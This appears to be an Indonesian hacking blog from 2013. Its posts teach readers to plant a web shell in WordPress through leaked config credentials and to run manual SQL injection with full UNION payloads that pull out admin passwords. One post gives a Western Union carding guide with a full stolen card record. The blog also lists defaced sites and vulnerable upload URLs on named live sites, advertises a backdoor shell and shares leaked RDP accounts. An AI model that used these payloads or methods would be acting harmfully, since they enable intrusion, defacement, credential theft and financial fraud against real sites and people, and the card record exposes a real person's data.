Tutorial Tanam Shell via Config

Selamat Malam Silent Reader,
Kali Ini Admin Akan Membahas Tentang Cara Menanam Shell lewat Config

Banyak Sekali "Defacer" Yang Sudah Bisa Menanam Config,Namun Bingung Bagaimana Cara Menggunakanya,Oleh Karena Itu Admin Akan Membahas Cara Menanam Shellnya ( For Wordpress )
Untuk Cara Menanam Config,Mungkin Akan Admin Post Dilain Waktu :)

Peralatan Tempur :
1.Shell Yang Sudah Tertanam dengan Config
2.MySQL Interface PHP
3.Kopi+Susu :)

1.Pilih Salah Satu Config,Pilih Yang Bertuliskan Wordpress ( Optional )
2.Maka Akan Nampak Beberapa Script,Seperti Gambar Dibawah :

3.Upload MySQL Interface PHP Anda,Dan Pergi Kelink Yang Sudah Diupload
4.Buka MySQL Interface PHP Yang Sudah Diupload Tadi,Dan Akan Nampak Gambar Dibawah :

5.Isi Nomor 1 Dengan DB User dan Isi Nomor 2 Dengan DB Password Tanpa Tanda Petik ( ' )
6.Maka Anda Akan Masuk Ke Halaman Database,Pilih Database Yang Sama Dengan Nama User DB ( Tidak Mesti Sama Juga )
7.Klik Menu Tables Sesuai Pilihan Tadi

7.Maka Anda Akan Masuk Kehalam Tables Database Dari Server Target
8.Lihat Pada Tables Yang Bernama : wp_options dan wp_user (Bisa Juga : NamaTarget_Options)
9.Klik Menu 'DATA' Pada Tables "Target_options" dan "Target_user"
10.*PADA TABLES USER*,Edit Formnya Sesuai Keininganmu,Password Hanya Bisa Menerima Berjenis MD5 ( Hash Disini http://exploitday.com/md5.php )

11.Jika Sudah Selesai,Klik Edit Data
12.*PADA TABLES OPTIONS*,Maka Akan Terlihat Link Target,Copy Dan Paste Di Addres Bar.Tambahkan /wp-admin di Belakang URL Target. ( Contoh http://targetku.com/wp-admin )

13.Setelah Menambahkan /wp-admin atau /wp-login.php di Belakang URL Target,Enter dan Maka Anda Akan Dibawa Ke Halaman Form Login Admin Wordpress
14.Isi Sesuai Username dan Password yang Anda Buat Tadi

15.Login dan Jika Login Sukses Maka Anda Akan Dibawa Ke Halaman Dasbor Admin
**Jika Site Dalam Bahasa Selain Inggris,Saya Sarankan Anda Agar Memakai Browser Google Chorme Yang Bisa Otomatis Mentraslate Website
16.Klik Menu Themes->Editor

17.Setelah Itu,Anda Akan Dibawa Ke Halaman Editor Themes,Pilih File 404.php ( Selain Ini Juga Bisa atau Jika Tidak ada 404.php Bisa Memakai File Lain )
18.Ganti Script Yang Ada dengan Script Shell Mu,Setelah Itu Klik Update

19.Jika Update Sukses,Maka Anda Tinggal Menuju Ke Halaman 404.php,Dimana Lokasinya di http://TARGETKAMU.com/404.php
20.Jika Sukses,Maka Anda Akan Dibawa Ke Halaman Shell Anda ^_^

21.Setelah Itu,Terserah Deh Site Mau Diapain xD

Sekian Tutorial Dari Saya,Jika Ada Salah Kata Mohon Dimaafkan
Regards,
El-Yofro

keyword : deface dengan config,tutorial config,cara menanam config,cara menanam shell,cara deface dengan config,apa itu config

Tutorial SQL Manual Sederhana

Selamat Malam Pemirsa xD
Berjumpa Lagi Dengan Admin Ganteng Disini 8)
Admin Mau Bagi Tutor Nih *weseh
SQL Manual,Yap Cara Yang Sudah Sangat Tua Namun Masih Vuln :v
Daripada Kebanyakan Bacot Mending Langsung Ke Tutorial :v

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

keyword : sql manual,deface dengan sql manual,tutorial sql manual,hack sql manual,sql injection,tutorial sql injection

Carding Dengan Western Union

Selamat Malam Para Haiker Sekalian xD
Berjumpa Lagi Dengan Mimin Ganteng Disini :v
Udah Lama Ye Mimin Kagak Ngeblog ?..... :v

Kali Ini Kita Akan Belajar Tentang Carding *weseh
Jangan Bingung Dulu,Saya Tidak Pernah Menuntut Hal Carding Untuk Kejahatan,Hanya Untuk Pembelajaran xD
Carding Bahasa Gampangane,Nyolong Duit Online... Ngono Kui Lah
"Carding Dosa Dong?" Nggak Dosa Juga Kalo Hasil Cardingnya Disumbangin Ke Orang Yang Tidak Mampu Seperti Mimin :3

Proof :

Langsung Saja Menuju Tutorial..
====================================================================

Tools :

1.Internet Dengan Proxy,Atau Lebih Bagus Lagi VPN
2.CC(Credit Card) UK Bin
3.Diutamakan Full Info CC,Atau Yang Non AVS dan Non VBV(Verified by Visa)

*Contoh CC Full Info :

4658598767100863
CVV: 773
Full name: Trevor J Thomas
Expires: 04/14
DOB: 25/feb/1955
Country: United Kingd0m
State: CHESAPEAKE
City: CHESAPEAKE Address: 6 Norwich Road, DONCASTER,
Post Code / ZIP: DN2 4QD
Phone: 01785777055SSN:MMN: michael

-------------------------------------------------------------------------------------------------------------

[-]Step One

Set IP Ke UK Dulu Pastinya
Kalo Udah,Pergi ke http://www.westernunion.co.uk/gb/Home.page?
Daftar Sesuai Data CC,Jangan Lupa Imel Valid
Pilih Send to Country (Indonesia)
Money In Minutesmax Pengiriman 50 gpb + Biaya 4.90 gpb = 54.90 gpb (Rp 735.908xx)
Tulis Nama Penerima Sesuai KTP(Ra Ndue,Njaluk Bapakmu)

[-]Step Two

1. Isi Data Pengirim Confirm CVV,Review Confirm Payment and Receiver Details No Telp (Diusahakan sama Karena Biasanya BOT WU Mengecek dengan List DiBank )

2. Isi VBV or Master Code Kalo Diminta ( Tapi Ada Bin Tertentu Yang Tanpa VBV )

3. Receipt (Succes!)

Kalo Sukses Terkirim,Akan Tampil Seperti ini Di Home WU :

Thank You for choosing Western Union.Your money transfer has been sent and can be picked up at any Agent location in your receiver's area. You will receive an email confirming this transaction.

"Identity Verification Status: Not VerifiedRemaining Online Transactions Allowed: 1 (normal 2)Identity Verification Process: Not Started"

Dan Nanti Akan Disertai MTCN Seperti ini (MTCN 8422679629 )

4.Selanjutnya Bawa Ambil WU dengan MTCN itu Disertai Identitas KTP (Ra Ndue Nyilih Bapakmu Kandani)


Sekian Saja Tutorial Dari Mimin,Kalo Ada Yang Bertanya "Cara Mendapatkan CC Bagaimana?" Ya Cari Ndiri Lah :v Nanti Kapan-Kapan Mimin Ganteng Juga Akan Ngepost Tutorialnya :v
Ingat,Jangan Disalah Gunakan...Saya Tidak Pernah Menganjurkan Untuk Melakukan Tutorial di Blog Saya ini

keyword : carding,western union,tutorial carding,carding dengan western union,cara carding,tutorial carding sederhana

Sambut Ramadhan,"Hacker" Marak Mendeface Situs

08 July 2013 | YogaWebster

Menjelang Puasa Ramadhan 1434 Hijiriah,"Hacker" Atau Yang Pantas Disebut Defacer Marak Mendeface Situs-Situs Di Dunia Maya
Hacker Menuliskan "Marhaban Ya Ramadhan"Atau "Selamat Menjalankan Puasa" Dan Masih Banyak Lagi
Hacker Mengaku,Mereka Ingin Memuaskan Hasrat Deface Mereka Sebelum Puasa Tiba
Hacker Juga Mengatakan,Bahwa Mereka Akan Memperingati "Hacker's Day" Dimana Aktivitas Hacking Akan Dihentikan Selama Bulan Ramadhan/Awal Ramadhan
Aksi Hacker ini Juga Tentu Didukung Oleh Sejumlah Pihak,Tak Lain Juga Pemilik-Pemilik Situs Didunia Maya
Semoga Dibulan Ramadhan Yang Penuh Berkah Ini,Kita Semua Diberi Ketakwaan Dan Kesabaran Yang Cukup Untuk Menjalani Puasa Ramadhan =))
Berikut Adalah Sebagian Dari Website/Situs Yang Diretas Oleh Para Hacker :
http://capedrium-workspace.fr/puasa.txt
http://csabiga.hu/puasa.txt
http://christmannlog.com/puasa.txt
http://aadyl.fr/puasa.txt
http://africanentrepreneur.org/puasa.txt
http://2beelog.com/puasa.txt
http://123.2beelog.com/puasa.txt
http://christmann.hu/puasa.txt
http://logiciel-apiculture.fr/puasa.txt
http://lodestar2005.com/puasa.txt
http://topmostwooden.com/puasa.txt
http://boweity.com/puasa.txt
http://china-lc.com/puasa.txt
http://www.nexusinformatica.biz/puasa.txt
http://whqxj.com/puasa.txt
http://oa.ehust.net/puasa.txt
http://www.pianoarts.cn/puasa.txt
http://hljyhdc.com/puasa.txt
http://lsmdly.com/puasa.txt
http://syxycf.com/puasa.txt
http://360carbuy.com/puasa.txt
http://sripe.net/puasa.txt
http://rentaizhen.com/puasa.txt
http://gyxjsxx.com/puasa.txt
http://lqeww.com/puasa.txt
http://cnacparts.com/puasa.txt
http://597023.com/puasa.txt
http://rhrent.com/puasa.txt
http://shaids.org/puasa.txt
http://nyrab.org/puasa.txt
http://bdbal.com/puasa.txt
http://hbsqbxx.com/puasa.txt
http://hzmfmr.com/puasa.txt
http://main.chinadesign-cde.com/puasa.txt
http://shop.huoban198.com/puasa.txt
http://winasean.51hipt.cn/puasa.txt
http://bbsbbs8.com/puasa.txt
http://beiwaibbs.com/puasa.txt
http://hunan.slyy.org/puasa.txt
http://muzhan.nongdamuye.com/puasa.txt
http://cz.tjerp.com/puasa.txt
http://591qian.com/puasa.txt
http://ledaozc.com/puasa.txt
http://topmostwooden.com/puasa.txt
http://carneycreations.net/puasa.txt
http://linaweaver.com/puasa.txt
http://lvntravel.com/puasa.txt
http://lvvetsparade.com/puasa.txt
http://saloncooperative.com/puasa.txt
http://mtblawyers.com/puasa.txt
http://temp5.carneycreations.net/puasa.txt
http://terishairloft.com/puasa.txt
http://thehighnoon.com/puasa.txt
http://thesaloncooperative.com/puasa.txt
http://exigoaccounting.com/puasa.txt
http://lansingliquorandwine.com/puasa.txt
http://leavenworthhistory.org/puasa.txt
http://lvvetsparade.com/puasa.txt
http://no-slip-grip.com/puasa.txt
http://prancerandfriends.com/puasa.txt
Pastebin : http://pastebin.com/MXqiQY8w

Cukup Sekian Dan Terima Nasi.
keyword : hacker ramadhan,puasa ramadhan,puasa 2013,jadwal puasa 2013,ramadhan 1434,puasa 1434 hijriah,1434 hijriah,berita hacker,sambut ramadhan,sambut puasa

Y0G4rt Shell Backdoor v.1.0 ( Recoded )

07 July 2013 | YogaWebster

Bertemu Lagi Dengan Admin Ganteng 8)
Kali Ini Admin Akan Membahas Ke Dunia Underground Lagi *weseh :v
Yaps...
Yang Akan Admin Bahas Kali ini Adalah " Backdoor "
Yang Jadi Heker/Haiker/Depeser/Empeser Pasti Udah Tau Dong Apa Itu Backdoor Atau Yang Sering Disebut " Shell "
Ane Mau Bagi Nih Shell Yang Udah Ane Encode,Filenya Jadi Sangat Kecil
Kurang Dari 1KB Malah xD
Dibalik Sizenya Yang Super Kecil,Fiturenya Juga Banyak Loh,Malah Gak Kalah Sama Fiture Shell Tetangga xD *weseh :v
Berikut Penampakanya Pemirsa :

  

Fiturenya Antara Lain ;

 Home -- File Manager -- Command Execute -- Back Connect -- Bypass Command Execute(SF-DF) -- Symlink -- Bypass Directory -- Eval Php -- Database -- Convert -- Mail Bomber

Server Information -- Dos Local Server -- Backup Database -- Mass Deface -- Download Remote File -- DDoS -- Find Writable Directory -- Bypass Symlink -- & Many More

Terimakasih Kepada : iTSecTeam | Biang Kerox Team | Xcode Yogyafree | Black4rtnymouZ | NewbienymouZ | Indonesian Cyber Army |  Indonesian Black Cyber | Surabaya Blackhat | Yogyakarta Blackhat | YogyacarderLink | Indohack | JemberHacker Team | Kalimantan Cyber Hacked | Dz Spammer | & You Pastinya :*

Download : Here

Password : yogawebster.blogspot.com

keyword : Y0G4rt Shell , Y0G4rt , El-Yofro , El-Yofro Shell, shell backdoor, download c99 shell, download 1n73ction shell

List Target Deface Shop737 Terbaru

intext:”Powered by shop737”

  

Admin Mau Bagi Nih List Target Deface Dengan Shop737 Yang Masih FRESH !

Monggo Bisa Dicoba Satu Satu ^_^

Admin Nitip Nick Aja , "El-Yofro"

Untuk Tutorial Cara NEBAS/DEFACEnya , Monggo KE SINI

#####LEAKED BY El-YOFRO#######
http://sundy-reload.net/poto/index/upload.php
http://mbsfx.info/poto/upload.php
http://www.komodo-florestours.com/poto/upload.php

http://www.grahayatim.org/poto/upload.php
http://www.apartementdibandung.com/poto/upload.php
http://murniwisata.com/poto/upload.php
http://www.cleohair602.com/poto/upload.php
http://www.stt-katharos.com/poto/upload.php
http://www.outletgrosironline.com/poto/upload.php

http://www.pondokkhitan.com/poto/upload.php

http://jualanparfummurah.com/poto/upload.php
http://www.outletgrosironline.com/poto/upload.php
http://rumahsusu-karawang.com/poto/upload.php
http://rumahcetakraswari.com/poto/upload.php

#####LEAKED BY El-YOFRO#######

keyword : intext:”Powered by shop737” ,shop737,deface dengan shop737,target shop747,deface shop737,teknik deface shop737

Free RDP Account VPS Windows 04 July 2013

04 July 2013 | YogaWebster

Sudah Lama Nih Gak Ketemu Lagi :3
Admin Abis Pergi Liburan Ke Kampoenggg :v
Maklum,Disana Kagak Ada Kompi,Apalagi Lepi :3
Udah Langsung Aja,Ane Mau Share Lagi Nih
Free RDP Account VPS Windows Leaked by Me

VPS Bisa Digunain Untuk Scann Paypal Lah,Mass Mailer,Buat Private Server, etc
Langsung Aja Gak Banyak Bacot Nih Linknya :
-> http://adfoc.us/9454825652649

Kalo Gak Work Jangan Salahin Mimin :p , Berarti Ada Orang Yang Udah Ngeganti Passnya/Ngedelete Akunnya
Sekian Dari Ane

keyword :free rdp account,free vps windows,free rdc account,free rdp windows,rdp account 04 july 2013,rdc account 04 july 2013